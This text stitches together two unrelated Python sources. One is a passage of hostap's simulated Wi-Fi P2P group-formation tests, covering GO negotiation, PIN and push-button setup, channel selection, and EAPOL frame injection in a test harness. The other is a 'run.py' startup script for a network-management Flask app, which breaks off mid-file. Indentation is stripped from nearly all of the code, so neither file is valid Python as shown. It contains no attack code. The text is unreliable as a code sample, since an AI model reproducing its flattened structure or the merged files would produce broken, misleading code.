r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
if test_data:
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
timeout=20, go_intent=i_intent, freq=freq,
provdisc=provdisc)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
if r_listen:
r_dev.p2p_listen()
else:
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, timeout=20, freq=r_freq)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init_pbc thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def remove_group(dev1, dev2):
dev1.remove_group()
try:
dev2.remove_group()
except:
pass
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
try:
dev[0].request("SET p2p_group_idle 2")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[1].remove_group()
ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
if ev is None:
raise Exception("GO did not remove group on idle timeout")
if "GO reason=IDLE" not in ev:
raise Exception("Unexpected group removal event: " + ev)
finally:
dev[0].request("SET p2p_group_idle 0")
def test_grpform_a(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
"""P2P group formation using PIN and re-init GO Negotiation (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
"""P2P group formation with PD-before-GO-Neg workaround"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
"""P2P group formation with extended listen timing enabled"""
try:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 100 50000"):
raise Exception("Failed to set extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
raise Exception("Failed to set extended listen timing")
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
if peer1['ext_listen_interval'] != "40000":
raise Exception("Extended listen interval not discovered correctly")
if peer1['ext_listen_period'] != "200":
raise Exception("Extended listen period not discovered correctly")
peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
if peer0['ext_listen_interval'] != "50000":
raise Exception("Extended listen interval not discovered correctly")
if peer0['ext_listen_period'] != "100":
raise Exception("Extended listen period not discovered correctly")
remove_group(dev[0], dev[1])
finally:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
"""P2P GO Negotiation with one device using PBC and the other PIN"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
"""P2P GO Negotiation with one device using PIN and the other PBC"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
"""P2P group formation with per-STA PSKs"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
pin = dev[2].wps_read_pin()
dev[0].p2p_go_authorize_client(pin)
c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
check_grpform_results(i_res, c_res)
if r_res['psk'] == c_res['psk']:
raise Exception("Same PSK assigned for both clients")
hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
dev[0].remove_group()
dev[1].wait_go_ending_session()
dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
"""P2P group formation with per-STA PSKs with non-P2P WPS STA"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[0].p2p_go_authorize_client_pbc()
dev[2].request("WPS_PBC")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=30)
if ev is None:
raise Exception("Association with the GO timed out")
hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
dev[0].remove_group()
dev[2].request("DISCONNECT")
dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
"""P2P group formation forced channel selection by GO"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
i_freq=2432,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2432":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
"""P2P group formation preferred channel selection by GO"""
dev[0].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2442":
raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
"""P2P group formation preferred channel selection by GO overridden by client"""
dev[1].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2422,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2422":
raise Exception("Unexpected channel - did not follow client's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
"""P2P group formation with no-GO freq forcing channel"""
dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow no-GO freq")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
"""P2P group formation fails due to no-GO range forced by client"""
dev[1].request("SET p2p_no_go_freq 2000-3000")
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15,
expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
"""P2P group formation with world roaming regulatory"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=14,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
"""P2P GO Negotiation with incorrect PIN"""
dev[1].p2p_listen()
pin = dev[1].wps_read_pin()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer not found")
dev[1].p2p_go_neg_auth(dev[0].p2p_dev_addr(), pin, 'display', go_intent=0)
dev[0].request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
ev = dev[1].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
if ev is None:
raise Exception("Group formation failure timed out")
ev = dev[0].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
if ev is None:
raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
"""User rejecting group formation attempt by a P2P peer"""
addr0 = dev[0].p2p_dev_addr()
dev[0].p2p_listen()
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
raise Exception("P2P_REJECT failed")
dev[1].request("P2P_STOP_FIND")
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=11" not in ev:
raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
"""GO Negotiation after PD, but no Probe Response"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Peer not found")
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from Probe Request")
time.sleep(0.3)
dev[0].request("P2P_FLUSH")
dev[0].p2p_listen()
dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
if ev is None:
raise Exception("PD Request timed out")
ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
if ev is None:
raise Exception("PD Response timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] != '0':
raise Exception("Peer listen frequency learned unexpectedly from PD Request")
pin = dev[0].wps_read_pin()
if "FAIL" in dev[1].request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
raise Exception("P2P_CONNECT on initiator failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("GO Negotiation start timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
if "FAIL" in dev[0].request("P2P_CONNECT " + addr1 + " " + pin + " display"):
raise Exception("P2P_CONNECT on responder failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
"""P2P GO Negotiation rejected due to already started negotiation with another peer"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[1].p2p_listen()
dev[2].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
if not dev[0].discover_peer(addr2):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
dev[0].p2p_listen()
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("timeout on GO Neg RX event")
dev[2].request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=5" not in ev:
raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
hapd_global = hostapd.HostapdGlobal()
hapd_global.remove(ifname)
dev[0].p2p_stop_find()
dev[1].p2p_stop_find()
dev[0].dump_monitor()
dev[1].dump_monitor()
time.sleep(0.1)
dev[0].request("BSS_FLUSH 0")
dev[0].request("SCAN freq=2412 only_new=1")
dev[1].request("BSS_FLUSH 0")
dev[1].request("SCAN freq=2412 only_new=1")
time.sleep(1)
def test_grpform_pbc_overlap(dev, apdev):
"""P2P group formation during PBC overlap"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
time.sleep(0.1)
    # Since the P2P Client scan case is now optimized to use a specific SSID, the
    # WPS AP will not reply to that and the scan after GO Negotiation can quite
    # likely miss the AP due to the dwell time being short enough to miss the Beacon
    # frame. This has made the test case somewhat pointless, but keep it here
    # for now with an additional scan to confirm that PBC detection works if
    # there is a BSS entry for an overlapping AP.
for i in range(0, 5):
dev[0].scan(freq="2412")
if dev[0].get_bss(apdev[0]['bssid']) is not None:
break
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
"""P2P group formation during PBC overlap using group interfaces"""
    # Note: Need to include the P2P IE from the AP so that the P2P interface BSS
    # update uses this information.
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
"beacon_int": "15", 'manage_p2p': '1' }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_stop_find()
dev[0].scan(freq="2412")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
"P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
# Do not report this as failure since the P2P group formation case
# using a separate group interface has limited chances of "seeing" the
# overlapping AP due to a per-SSID scan and no prior scan operations on
# the group interface.
logger.info("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
"""P2P group formation fails while using group interface"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].p2p_listen()
peer = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(peer):
raise Exception("Peer " + peer + " not found")
if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
raise Exception("P2P_REJECT failed")
if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
raise Exception("P2P_CONNECT failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
"""P2P GO Negotiation wait for credentials to become ready [long]"""
if not params['long']:
logger.info("Skip test case with long duration due to --long not specified")
return "skip"
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
start = os.times()[4]
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=200)
if ev is None:
raise Exception("GO Negotiation failure timed out")
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
"""P2P group formation with WSC-Done not sent"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
for i in range(0, 2):
dev[0].request("SET ext_eapol_frame_io 1")
dev[1].request("SET ext_eapol_frame_io 1")
dev[0].p2p_listen()
dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
dev[1].p2p_listen()
dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
go_intent=15, wait_group=False)
while True:
ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from GO")
res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from P2P Client")
msg = ev.split(' ')[2]
if msg[46:56] == "102200010f":
logger.info("Drop WSC_Done")
dev[0].request("SET ext_eapol_frame_io 0")
dev[1].request("SET ext_eapol_frame_io 0")
# Fake EAP-Failure to complete session on the client
id = msg[10:12]
dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
break
res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on GO")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on P2P Client")
dev[0].remove_group()
|
run.py
|
import os
import coverage
import atexit
import signal
import threading
from typing import List
from gevent import monkey, signal as gevent_signal
from redis import StrictRedis
from cnaas_nms.app_settings import api_settings
# Do late imports for anything cnaas/flask related so we can do gevent monkey patch, see below
os.environ['PYTHONPATH'] = os.getcwd()
stop_websocket_threads = False
print("Code coverage collection for worker in pid {}: {}".format(
os.getpid(), ('COVERAGE' in os.environ)))
if 'COVERAGE' in os.environ:
cov = coverage.coverage(
data_file='/coverage/.coverage-{}'.format(os.getpid()),
concurrency="gevent")
cov.start()
def save_coverage():
cov.stop()
cov.save()
atexit.register(save_coverage)
gevent_signal.signal(signal.SIGTERM, save_coverage)
gevent_signal.signal(signal.SIGINT, save_coverage)
def get_app():
from cnaas_nms.scheduler.scheduler import Scheduler
from cnaas_nms.plugins.pluginmanager import PluginManagerHandler
from cnaas_nms.db.session import sqla_session
from cnaas_nms.db.joblock import Joblock
from cnaas_nms.db.job import Job
# If running inside uwsgi, a separate "mule" will run the scheduler
try:
import uwsgi
print("Running inside uwsgi")
except (ModuleNotFoundError, ImportError):
scheduler = Scheduler()
scheduler.start()
pmh = PluginManagerHandler()
pmh.load_plugins()
try:
with sqla_session() as session:
Joblock.clear_locks(session)
except Exception as e:
print("Unable to clear old locks from database at startup: {}".format(str(e)))
try:
with sqla_session() as session:
Job.clear_jobs(session)
except Exception as e:
print("Unable to clear jobs with invalid states: {}".format(str(e)))
return app.app
def socketio_emit(message: str, rooms: List[str]):
if not app.socketio:
return
for room in rooms:
app.socketio.emit("events", message, room=room)
def loglevel_to_rooms(levelname: str) -> List[str]:
if levelname == 'DEBUG':
return ['DEBUG']
elif levelname == 'INFO':
return ['DEBUG', 'INFO']
elif levelname == 'WARNING':
return ['DEBUG', 'INFO', 'WARNING']
elif levelname == 'ERROR':
return ['DEBUG', 'INFO', 'WARNING', 'ERROR']
elif levelname == 'CRITICAL':
return ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']
def parse_redis_event(event):
try:
        # [stream, [(messageid, {datadict})]]
if event[0] == "events":
return event[1][0][1]
except Exception as e:
return None
def emit_redis_event(event):
try:
if event['type'] == "log":
socketio_emit(event['message'], loglevel_to_rooms(event['level']))
elif event['type'] == "update":
socketio_emit(json.loads(event['json']), ["update_{}".format(event['update_type'])])
except Exception as e:
pass
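# Example event payloads (shape assumed from the fields read above; concrete values are
# illustrative only):
#   {"type": "log", "level": "INFO", "message": "device synchronized"}
#   {"type": "update", "update_type": "device", "json": "{\"hostname\": \"dist1\"}"}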
def thread_websocket_events():
redis: StrictRedis
with redis_session() as redis:
while True:
result = redis.xread({"events": b"$"}, count=10, block=200)
for item in result:
event = parse_redis_event(item)
if not event:
continue
emit_redis_event(event)
if stop_websocket_threads:
break
if __name__ == '__main__':
# Starting via python run.py
# gevent monkey patching required if you start flask with the auto-reloader (debug mode)
monkey.patch_all()
from cnaas_nms.api import app
from cnaas_nms.db.session import redis_session
import json
t_websocket_events = threading.Thread(target=thread_websocket_events)
